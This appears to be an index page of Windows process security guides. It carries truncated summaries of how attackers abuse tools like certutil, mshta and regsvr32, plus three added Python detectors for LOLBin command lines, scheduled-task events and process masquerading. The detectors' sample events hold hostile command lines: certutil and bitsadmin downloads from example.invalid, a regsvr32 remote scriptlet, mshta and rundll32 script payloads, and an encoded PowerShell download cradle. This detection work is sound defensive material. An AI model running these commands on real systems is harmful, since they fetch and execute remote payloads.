Security analysis and investigation guides for system files
EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vector**. Attackers abuse Excel via **malicious macros ...
Everything is a fast file search utility by Voidtools. Attackers may use it for rapid file discovery and reconnaissance to locate sensitive data on co...
ExpressVPN is a commercial VPN service client. While legitimate for privacy, it can be abused for C2 communications, bypassing network controls, and m...
HitmanPro is a portable anti-malware scanner from Sophos. It uses cloud-based behavioral analysis to detect threats. Legitimate security tool that cou...
Kodi is an open-source media center application. While primarily for entertainment, malicious add-ons can be used as attack vectors for malware distri...
MoUsoCoreWorker.exe is a Windows Update Orchestrator component that manages update operations. Legitimate system process that may be impersonated or c...
MpCmdRun.exe is the **Windows Defender command-line interface**. While legitimate for scanning and management, attackers abuse it as a **LOLBin to dow...
MsMpEng.exe is the **Windows Defender Antimalware Service Executable**, the core engine of Windows Security. It runs with **SYSTEM privileges** and is...
NordVPN is a commercial VPN client offering encrypted tunneling. Can be abused for evading network controls, C2 tunneling, and data exfiltration.
OBS Studio is open-source broadcasting and recording software. While legitimate, attackers may abuse it for screen recording, credential capture, and ...
OUTLOOK.EXE is the **Microsoft Outlook** email client. It is a **primary phishing delivery vector** where malicious attachments and links arrive. Attacker...
OneDrive.exe is the **Microsoft OneDrive cloud sync client**. Attackers abuse OneDrive for **data exfiltration** over trusted channels, **malware dist...
OpenVPN is a popular open-source VPN client that provides secure tunneling. Adversaries abuse it for data exfiltration, C2 tunneling, and bypassing ne...
PDF24 is a PDF creation and manipulation tool with virtual printer functionality. Generally low risk, but PDF tools can be involved in document manipu...
Process Hacker (now maintained as System Informer) is an advanced process monitoring tool. While legitimate for system administration, it is frequently abused by attackers to terminate s...
ProtonVPN is a privacy-focused VPN from Proton AG. Offers Secure Core routing and strong encryption. Can be abused for C2, exfiltration, and evading s...
RuntimeBroker.exe manages **permissions for Windows Store (UWP) apps**. It runs in user context and is common on Windows 10/11 systems. While less com...
Screenpresso is a screenshot and screen recording tool. While legitimate, it can be abused for surveillance, credential capture via screenshots, and c...
SearchIndexer.exe is the **Windows Search indexing service** that indexes files for fast search. It has access to read files across the system, making...
Skype.exe is the **Microsoft Skype** communication client. Attackers target Skype for **credential theft**, **malware distribution** via file sharing,...
Spotify.exe is the **Spotify music streaming** desktop client. Built on the Chromium Embedded Framework (CEF), it may be targeted for **credential theft** or used a...
Autoruns is a Sysinternals tool for viewing and managing Windows startup programs. Legitimate diagnostic tool that can be used by attackers for persis...
Sysmon.exe (System Monitor) is a **Microsoft Sysinternals** tool providing detailed logging of process creation, network connections, file changes, an...
VLC is a popular open-source media player. Has been exploited via malicious media files and can potentially be used for screen recording or covert str...
SearchFilterHost.exe is a Windows Search component that hosts filter handlers for content indexing. Has had historical vulnerabilities and may be impe...
SearchProtocolHost.exe is a Windows Search component that handles protocol handlers for accessing data sources. May be impersonated by malware.
SearchApp.exe is the Windows 10/11 Start menu search and Cortana component. Legitimate Windows process that may be impersonated by malware or targeted...
SearchHost.exe hosts the Windows 11 search user interface. It replaced SearchApp.exe in Windows 11 as the primary search UI component.
SecurityHealthService.exe is a Windows component that monitors system security health and provides the Windows Security Center functionality. Attacker...
WireGuard is a modern, high-performance VPN protocol. Its simplicity and speed make it attractive for both legitimate use and potential abuse for C2 a...
alg.exe (Application Layer Gateway Service) provides support for **third-party protocol plug-ins** for Internet Connection Sharing (ICS) and Windows F...
bitsadmin.exe is the **Background Intelligent Transfer Service** command-line tool and a **notorious LOLBin**. Attackers abuse it for **stealthy file ...
brave.exe is the **Brave Browser**, a privacy-focused Chromium-based browser with built-in ad blocking and crypto wallet features. As a Chromium deriv...
certutil.exe is a Windows **certificate management utility** and one of the most **notorious LOLBins** (Living-off-the-Land Binaries). Attackers abuse...
chrome.exe is the **Google Chrome web browser**, the most widely-used browser globally. Chrome's extensive feature set makes it a **high-value target*...
cmd.exe is the **Windows Command Interpreter** providing command-line access to the operating system. It is a **critical LOLBin** heavily abused for e...
cmstp.exe (Microsoft Connection Manager Profile Installer) is a Windows utility for installing connection profiles. It is a **dangerous LOLBin** that ...
conhost.exe (Console Host) hosts the console window for console applications (cmd.exe, PowerShell) on Windows 7 and later. One instance runs per console window. Malw...
csrss.exe (Client/Server Runtime Subsystem) is a **critical Windows system process**, the user-mode side of the Win32 subsystem, responsible for process/thread bookkeeping, shutdown, console windows (before Windows 7, when conhost.exe took over), and Wi...
ctfmon.exe (CTF Loader) manages the **Alternative User Input Text Input Processor (TIP)** and Microsoft Office Language Bar. It handles text services ...
curl.exe is a **command-line URL transfer tool** now built into Windows 10/11. It is increasingly used by attackers for **malware downloads**, **data ...
discord.exe is the **Discord communication platform** client, widely used for gaming and communities. Attackers abuse Discord's **CDN for malware host...
dism.exe (Deployment Image Servicing and Management) is a Windows utility for **servicing Windows images**. Attackers abuse DISM to **enable disabled ...
dllhost.exe (COM Surrogate) hosts COM objects out-of-process. Multiple instances are normal. Malware may inject into dllhost.exe or masquerade as it.
dropbox.exe is the **Dropbox cloud storage client** for file synchronization. Attackers abuse Dropbox for **data exfiltration** over trusted channels,...
dwm.exe (Desktop Window Manager) is a critical Windows process responsible for **visual effects**, window compositing, and the Aero interface. Running...
explorer.exe is the **Windows Shell** providing the desktop, taskbar, Start menu, and file browsing. It runs once per user session and is the parent o...
firefox.exe is the **Mozilla Firefox web browser**, a popular open-source browser. Attackers target Firefox for **credential theft** from stored passw...
fontdrvhost.exe (Usermode Font Driver Host) handles **font rendering** in user mode rather than kernel mode for improved security. Font parsing has hi...
iexplore.exe is **Microsoft Internet Explorer**, a legacy browser officially retired but still present on Windows systems. IE's **legacy COM interface...
java.exe is the **Java Runtime Environment** launcher, executing Java applications on Windows. Java has a **notorious security history** with many cri...
keepass.exe is the **KeePass password manager**, storing credentials in encrypted databases. As a **high-value target**, attackers attempt to steal Ke...
lsass.exe (Local Security Authority Subsystem Service) is the core Windows authentication process that stores user credentials in memory. It's the #1 ...
makecab.exe is a Windows utility for **creating cabinet (.cab) archive files**. It can be abused as a **LOLBin for data compression** before exfiltrat...
mbam.exe is the **Malwarebytes Anti-Malware** executable. Malwarebytes is a popular security tool for malware detection and removal. Attackers may att...
mdm.exe (Machine Debug Manager) enables **script debugging** in web browsers and Microsoft Office applications. It is part of Visual Studio debugging ...
msedge.exe is **Microsoft Edge**, the default Chromium-based browser on Windows 10/11. As the successor to Internet Explorer, Edge inherits the same t...
mshta.exe executes HTML Applications (.HTA files). It is a **critical LOLBin** abused for executing remote payloads, bypassing application controls, a...
msiexec.exe is the **Windows Installer** executable for installing, modifying, and removing MSI packages. It is a **potent LOLBin** that can **execute...
mstsc.exe is the **Microsoft Remote Desktop Connection** client for RDP sessions. It is heavily used by attackers for **lateral movement** after gaini...
net.exe is a Windows utility for managing **users, groups, shares, and services**. Attackers use net.exe extensively for **reconnaissance** (net user,...
netsh.exe (Network Shell) configures **Windows network settings**. Attackers abuse netsh for **firewall rule manipulation**, **port forwarding** (prox...
node.exe is the **Node.js JavaScript runtime**. Attackers abuse Node.js for **script-based attacks**, **C2 frameworks**, and leveraging npm packages f...
notepad.exe is the **Windows text editor**, a ubiquitous and trusted application. While typically benign, attackers use notepad.exe as a **process inj...
ntoskrnl.exe is the **Windows NT operating system kernel**, the core of Windows responsible for process management, memory management, and hardware ab...
powershell.exe is the **Windows PowerShell** scripting engine. It is the **#1 attack tool** used by threat actors for execution, download cradles, pos...
procexp.exe (Process Explorer) is a **Sysinternals advanced process viewer**. While a legitimate diagnostic tool, attackers may use it for **reconnais...
python.exe is the **Python programming language interpreter**. Attackers abuse Python for **script-based attacks**, running obfuscated malware, and le...
reg.exe is the Windows **Registry command-line editor** for querying and modifying the registry. Attackers use reg.exe extensively for **persistence**...
regsvr32.exe registers COM DLLs. It is a **LOLBin** abused for executing remote scripts via the /s /n /u /i switches ("Squiblydoo" technique), bypassi...
rundll32.exe is a Windows utility for executing DLL functions from the command line. It is one of the **most frequently abused Living-off-the-Land Bin...
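The LOLBin entries above (bitsadmin, certutil, cmstp, mshta, regsvr32 and rundll32) all reduce to one triage question: does the command line carry a remote or user-writable payload, and what launched it. The following Python is an added example by this editor, not code from any of the guides indexed here. The regexes encode the abuse patterns those entries name (certutil -urlcache, BITS /transfer, Squiblydoo via scrobj.dll, rundll32 javascript:, silent cmstp INF installs); the Office-parent heuristic is an assumption; and the events are constructed Sysmon-style process-creation records (Image, CommandLine, ParentImage, ProcessId), not captured telemetry.

```python
"""LOLBin command-line triage over Sysmon-style process-creation events (added example)."""
import ntpath
import re

# Abuse patterns for the LOLBins covered on this page. Each regex is matched
# case-insensitively against the full command line. Tune for your estate.
LOLBIN_RULES = {
    "certutil.exe": [
        (r"-urlcache\b.*https?://", "remote download via -urlcache"),
        (r"-decode\b", "base64 decode of a dropped payload"),
    ],
    "bitsadmin.exe": [
        (r"/transfer\b.*https?://", "BITS download job"),
        (r"/setnotifycmdline\b", "BITS job with a notify command (execution/persistence)"),
    ],
    "mshta.exe": [
        (r"https?://|javascript:|vbscript:", "remote or inline HTA payload"),
    ],
    "regsvr32.exe": [
        (r"/i:https?://.*scrobj\.dll|scrobj\.dll.*/i:https?://",
         "Squiblydoo: remote scriptlet via scrobj.dll"),
    ],
    "rundll32.exe": [
        (r"javascript:", "rundll32 javascript: protocol handler"),
        (r"\\(?:users|programdata|temp)\\[^,\s]*\.dll", "DLL loaded from a user-writable path"),
    ],
    "cmstp.exe": [
        (r"/ni\b.*/s\b|/s\b.*/ni\b", "silent INF install (UAC bypass / remote scriptlet)"),
    ],
}

# Heuristic (assumption, not from the page): any of the above spawned by an Office
# host deserves a look regardless of arguments; that is the macro-to-LOLBin chain.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path ('' if missing)."""
    return ntpath.basename(path or "").lower()


def triage_event(event):
    """Return the reasons one process-creation event is suspicious ([] if none)."""
    name = image_name(event.get("Image"))
    cmdline = event.get("CommandLine", "")
    reasons = [why for pattern, why in LOLBIN_RULES.get(name, [])
               if re.search(pattern, cmdline, re.IGNORECASE)]
    parent = image_name(event.get("ParentImage"))
    if name in LOLBIN_RULES and parent in OFFICE_HOSTS:
        reasons.append(f"launched by Office host {parent}")
    return reasons


def triage(events):
    """Run triage_event over a batch and keep only the events with findings."""
    findings = []
    for ev in events:
        reasons = triage_event(ev)
        if reasons:
            findings.append({"pid": ev["ProcessId"], "image": image_name(ev["Image"]),
                             "reasons": reasons})
    return findings


# Constructed sample events (shape of Sysmon Event ID 1 fields; not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\Users\Public\p.txt",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"ProcessId": 4204, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe vbscript:Close(Execute("GetObject(""script:http://example.invalid/a.sct"")"))',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 4240, "Image": r"C:\Windows\System32\regsvr32.exe",          # benign install
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\Vendor.dll"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"ProcessId": 4276, "Image": r"C:\Windows\System32\certutil.exe",          # benign use
     "CommandLine": r"certutil -dump C:\Users\alice\cert.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"ProcessId": 4292, "Image": r"C:\Windows\System32\rundll32.exe",          # benign control panel
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL inetcpl.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 4308, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"ProcessId": 4344, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority high http://example.invalid/u.exe C:\Users\Public\u.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessId": 4396, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\tmp1A2B.dll,Start",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["pid"], f["image"], "; ".join(f["reasons"]))
```

The benign records are there on purpose: regsvr32 registering a local DLL from an installer and certutil dumping a certificate must not fire, otherwise the rule set is unusable in a real queue. Command-line regexes are only a first pass; pair them with parent/child context and network telemetry before acting.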
sc.exe is the **Service Control** command-line tool, the client of the Service Control Manager (services.exe). Attackers heavily abuse sc.exe to **create malicious services for persistence**, ...
schtasks.exe is the Windows **Task Scheduler command-line** interface. It is a **primary persistence mechanism** used by attackers to schedule malicio...
services.exe is the **Windows Service Control Manager (SCM)**, responsible for starting, stopping, and managing all Windows services. It runs as NT AU...
slack.exe is the **Slack workplace communication** desktop client. Attackers target Slack for **token theft**, **data exfiltration** via webhooks, and...
smartscreen.exe is the **Windows SmartScreen Filter** that protects against malicious downloads and websites. Attackers actively try to **bypass or di...
smss.exe (Session Manager Subsystem) is the **first user-mode process** started by the Windows kernel during boot. It initializes the Windows subsyste...
spoolsv.exe is the Windows Print Spooler service. It has been exploited by **PrintNightmare (CVE-2021-34527)** and other critical vulnerabilities allo...
steam.exe is the **Steam gaming platform client** by Valve. Attackers target Steam for **account theft**, **game item fraud**, and **malware distribut...
svchost.exe is the legitimate Windows Service Host that hosts services implemented as DLLs. Multiple instances (10-50+) are normal on modern Windows. ...
taskeng.exe and taskhost.exe (Vista/7), taskhostex.exe (8/8.1) and taskhostw.exe (10+) execute scheduled tasks. **Scheduled tasks are a top persistence mechanism**. Monitor Event ID 4698 for t...
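The entries for schtasks.exe and the task host processes both point at Security Event ID 4698 (a scheduled task was created). That record carries the full task definition XML in its TaskContent field, so the useful triage is on the registered principal and the Exec action rather than on the process that ran schtasks. The following Python is an added example by this editor, not code from the indexed guides; the heuristics (SYSTEM principal registered by a non-SYSTEM account, user-created tasks hiding under \Microsoft\Windows\, script hosts or user-writable binaries as actions, encoded arguments) are assumptions, and the three events are constructed in the shape of a 4698 record, not exported from a real log.

```python
"""Triage of Security event 4698 (scheduled task created) from its XML (added example)."""
import ntpath
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
SYSTEM_SID = "S-1-5-18"

# Script hosts and LOLBins that rarely belong in a task action on a managed host (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(?:users|programdata|temp|appdata)\\", re.IGNORECASE)
ENCODED_OR_REMOTE = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\b|https?://", re.IGNORECASE)


def event_data(event_xml):
    """Map the EventData <Data Name=...> fields of a Windows event record to a dict."""
    root = ET.fromstring(event_xml)
    return {d.get("Name"): (d.text or "") for d in root.iter(EVT_NS + "Data")}


def analyze_4698(event_xml):
    """Return {'task', 'subject', 'reasons'} for one 4698 record; empty reasons means nothing odd."""
    data = event_data(event_xml)
    task = ET.fromstring(data["TaskContent"])   # the registered task definition, itself XML
    subject_sid = data.get("SubjectUserSid", "")
    task_name = data.get("TaskName", "")
    reasons = []

    # A non-SYSTEM account registering a task that runs as SYSTEM is a classic
    # privilege-escalation / persistence shape.
    for principal in task.iter(TASK_NS + "Principal"):
        if principal.findtext(TASK_NS + "UserId", "") == SYSTEM_SID and subject_sid != SYSTEM_SID:
            reasons.append("non-SYSTEM subject registered a task that runs as SYSTEM")

    # Built-in tasks live under \Microsoft\Windows\ and are registered by SYSTEM (or setup);
    # a user account creating there is hiding in the crowd (heuristic).
    if task_name.lower().startswith("\\microsoft\\windows\\") and subject_sid != SYSTEM_SID:
        reasons.append("task registered under \\Microsoft\\Windows\\ by a non-SYSTEM subject")

    for action in task.iter(TASK_NS + "Exec"):
        command = action.findtext(TASK_NS + "Command", "")
        arguments = action.findtext(TASK_NS + "Arguments", "")
        if USER_WRITABLE.search(command):
            reasons.append(f"action binary in a user-writable path: {command}")
        if ntpath.basename(command).lower() in SCRIPT_HOSTS:
            reasons.append(f"action runs a script host/LOLBin: {ntpath.basename(command)}")
        if ENCODED_OR_REMOTE.search(arguments):
            reasons.append("encoded command or remote URL in action arguments")

    return {"task": task_name, "subject": data.get("SubjectUserName", ""), "reasons": reasons}


# --- constructed sample records (shape of a real 4698, not captured data) -------------
def make_task(author, run_as_sid, command, arguments):
    return (f'<Task version="1.2" xmlns="{TASK_NS[1:-1]}">'
            f'<RegistrationInfo><Author>{escape(author)}</Author></RegistrationInfo>'
            f'<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>'
            f'<Principals><Principal id="Author"><UserId>{run_as_sid}</UserId>'
            f'<RunLevel>HighestAvailable</RunLevel></Principal></Principals>'
            f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
            f'<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>')


def make_4698(subject_user, subject_sid, task_name, task_xml):
    # TaskContent is XML nested inside XML, so it arrives escaped, exactly as in the event log.
    return f"""<Event xmlns="{EVT_NS[1:-1]}">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4698</EventID></System>
  <EventData>
    <Data Name="SubjectUserSid">{subject_sid}</Data>
    <Data Name="SubjectUserName">{subject_user}</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="TaskName">{escape(task_name)}</Data>
    <Data Name="TaskContent">{escape(task_xml)}</Data>
  </EventData>
</Event>"""


ALICE_SID = "S-1-5-21-1004336348-1177238915-682003330-1105"
BOB_SID = "S-1-5-21-1004336348-1177238915-682003330-1120"
SAMPLE_EVENTS = [
    make_4698("alice", ALICE_SID, r"\Microsoft\Windows\Updater\Updater",
              make_task(r"CORP\alice", SYSTEM_SID, r"C:\Users\alice\AppData\Roaming\Updater\upd.exe", "-silent")),
    make_4698("SYSTEM", SYSTEM_SID, r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
              make_task("Microsoft Corporation", SYSTEM_SID, r"%systemroot%\system32\usoclient.exe", "StartScan")),
    make_4698("bob", BOB_SID, r"\OneDrive Standalone Update Task",
              make_task(r"CORP\bob", BOB_SID, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                        "-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA")),
]

if __name__ == "__main__":
    for result in map(analyze_4698, SAMPLE_EVENTS):
        print(result["subject"], result["task"], result["reasons"] or "ok")
```

Two practical caveats: 4698 is only written when the Object Access > "Audit Other Object Access Events" subcategory is enabled, and modifications to an existing task surface as 4702 rather than 4698, so a hardened environment should audit both. The Microsoft-Windows-TaskScheduler/Operational log (Event ID 106, task registered) is an alternative source on hosts where the Security audit policy is not under your control.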
tasklist.exe displays **running processes** on local or remote systems. Attackers use tasklist for **security software detection**, **process reconnai...
whoami.exe displays **current user and privilege information**. While simple, it is a **universal reconnaissance command** run by nearly every attacke...
winlogon.exe is the **Windows Logon Application**, responsible for managing user authentication, Ctrl+Alt+Del handling, and user profile loading. It i...
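The entries for smss.exe, lsass.exe, services.exe, svchost.exe, dllhost.exe and winlogon.exe each warn that malware masquerades as or injects into core processes. The standard investigator's check is the same for all of them: image path, parent process and instance count against the known boot lineage. The following Python is an added example by this editor, not code from the indexed guides; the expectation table reflects a stock Windows 10/11 host (parent None marks processes whose real parent, a session smss.exe or userinit.exe, has normally exited), the lookalike threshold is an assumption, and the process snapshot is constructed, with three planted anomalies, not a capture.

```python
"""Parent/path/count sanity checks for core Windows processes (added example)."""
import difflib
import ntpath
from collections import Counter

SYSTEM32 = r"c:\windows\system32"
SYSWOW64 = r"c:\windows\syswow64"

# Expected launch context on a stock Windows 10/11 host (assumption; tune per build).
# parent=None: the real parent has normally exited, so parentage is not checked.
# max=None: any count is normal. Known legitimate exceptions exist (explorer.exe
# restarted from Task Manager has Taskmgr.exe as parent; a transient session smss.exe
# can be caught in a snapshot), so treat findings as leads, not verdicts.
EXPECTATIONS = {
    "smss.exe":          {"parent": "system",       "dirs": {SYSTEM32},           "max": 1},
    "csrss.exe":         {"parent": None,           "dirs": {SYSTEM32},           "max": None},
    "wininit.exe":       {"parent": None,           "dirs": {SYSTEM32},           "max": 1},
    "winlogon.exe":      {"parent": None,           "dirs": {SYSTEM32},           "max": None},
    "services.exe":      {"parent": "wininit.exe",  "dirs": {SYSTEM32},           "max": 1},
    "lsass.exe":         {"parent": "wininit.exe",  "dirs": {SYSTEM32},           "max": 1},
    "svchost.exe":       {"parent": "services.exe", "dirs": {SYSTEM32, SYSWOW64}, "max": None},
    "explorer.exe":      {"parent": None,           "dirs": {r"c:\windows"},      "max": None},
    "runtimebroker.exe": {"parent": "svchost.exe",  "dirs": {SYSTEM32},           "max": None},
    "taskhostw.exe":     {"parent": "svchost.exe",  "dirs": {SYSTEM32},           "max": None},
}


def lookalike(name, threshold=0.85):
    """Closest protected name if `name` is a near-miss (svch0st.exe, lsas.exe), else None."""
    name = name.lower()
    if name in EXPECTATIONS:
        return None
    best = max(EXPECTATIONS, key=lambda p: difflib.SequenceMatcher(None, name, p).ratio())
    return best if difflib.SequenceMatcher(None, name, best).ratio() >= threshold else None


def check_snapshot(procs):
    """Return (pid, name, reason) findings for a list of {pid, ppid, name, path} records."""
    by_pid = {p["pid"]: p for p in procs}
    counts = Counter(p["name"].lower() for p in procs)
    findings = []
    for p in procs:
        name = p["name"].lower()
        exp = EXPECTATIONS.get(name)
        if exp is None:
            twin = lookalike(name)
            if twin:
                findings.append((p["pid"], name, f"name resembles protected process {twin}"))
            continue
        if ntpath.dirname(p["path"]).lower() not in exp["dirs"]:
            findings.append((p["pid"], name, f"unexpected image path {p['path']}"))
        parent = by_pid.get(p["ppid"])
        parent_name = parent["name"].lower() if parent else None
        if exp["parent"] is not None and parent_name != exp["parent"]:
            findings.append((p["pid"], name,
                             f"unexpected parent {parent_name or '<exited>'} (expected {exp['parent']})"))
        if exp["max"] is not None and counts[name] > exp["max"]:
            findings.append((p["pid"], name,
                             f"{counts[name]} instances (expected at most {exp['max']})"))
    return findings


# Constructed snapshot (pid, ppid, name, path); the last three records are planted anomalies.
SNAPSHOT = [
    {"pid": 4,    "ppid": 0,    "name": "System",            "path": ""},
    {"pid": 368,  "ppid": 4,    "name": "smss.exe",          "path": r"C:\Windows\System32\smss.exe"},
    {"pid": 472,  "ppid": 456,  "name": "csrss.exe",         "path": r"C:\Windows\System32\csrss.exe"},
    {"pid": 548,  "ppid": 456,  "name": "wininit.exe",       "path": r"C:\Windows\System32\wininit.exe"},
    {"pid": 556,  "ppid": 540,  "name": "winlogon.exe",      "path": r"C:\Windows\System32\winlogon.exe"},
    {"pid": 656,  "ppid": 548,  "name": "services.exe",      "path": r"C:\Windows\System32\services.exe"},
    {"pid": 676,  "ppid": 548,  "name": "lsass.exe",         "path": r"C:\Windows\System32\lsass.exe"},
    {"pid": 796,  "ppid": 656,  "name": "svchost.exe",       "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 820,  "ppid": 656,  "name": "svchost.exe",       "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 3312, "ppid": 3208, "name": "explorer.exe",      "path": r"C:\Windows\explorer.exe"},
    {"pid": 4100, "ppid": 820,  "name": "RuntimeBroker.exe", "path": r"C:\Windows\System32\RuntimeBroker.exe"},
    {"pid": 4700, "ppid": 3312, "name": "OneDrive.exe",      "path": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    {"pid": 5120, "ppid": 3312, "name": "svchost.exe",       "path": r"C:\Users\alice\AppData\Roaming\svchost.exe"},
    {"pid": 5204, "ppid": 5120, "name": "lsass.exe",         "path": r"C:\Windows\Temp\lsass.exe"},
    {"pid": 5330, "ppid": 3312, "name": "svch0st.exe",       "path": r"C:\ProgramData\svch0st.exe"},
]

if __name__ == "__main__":
    for pid, name, reason in check_snapshot(SNAPSHOT):
        print(pid, name, reason)
```

Note what the rules do and do not catch: a second lsass.exe is flagged three ways (path, parent, count), the svchost.exe under a user profile is flagged on path and on its explorer.exe parent, and the digit-for-letter lookalike is caught by name similarity, whereas a process that injects into a genuine lsass.exe or svchost.exe looks perfect here and needs memory or module inspection instead.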
wmic.exe is the **WMI command-line interface** providing access to Windows Management Instrumentation. It is a **powerful LOLBin** used for **remote c...
wmiprvse.exe (WMI Provider Host) executes WMI queries and hosts WMI providers. It is abused for **lateral movement, persistence via event subscription...
wscript.exe (Windows Script Host) executes **VBScript and JScript** files. It is one of the **most abused Windows components** for malware delivery vi...
wuauclt.exe (Windows Update AutoUpdate Client) manages **Windows Update operations** including checking for updates and downloading patches. It is a *...
wudfhost.exe (Windows User-mode Driver Framework Host) hosts **user-mode device drivers** that run outside the kernel for improved stability. It manag...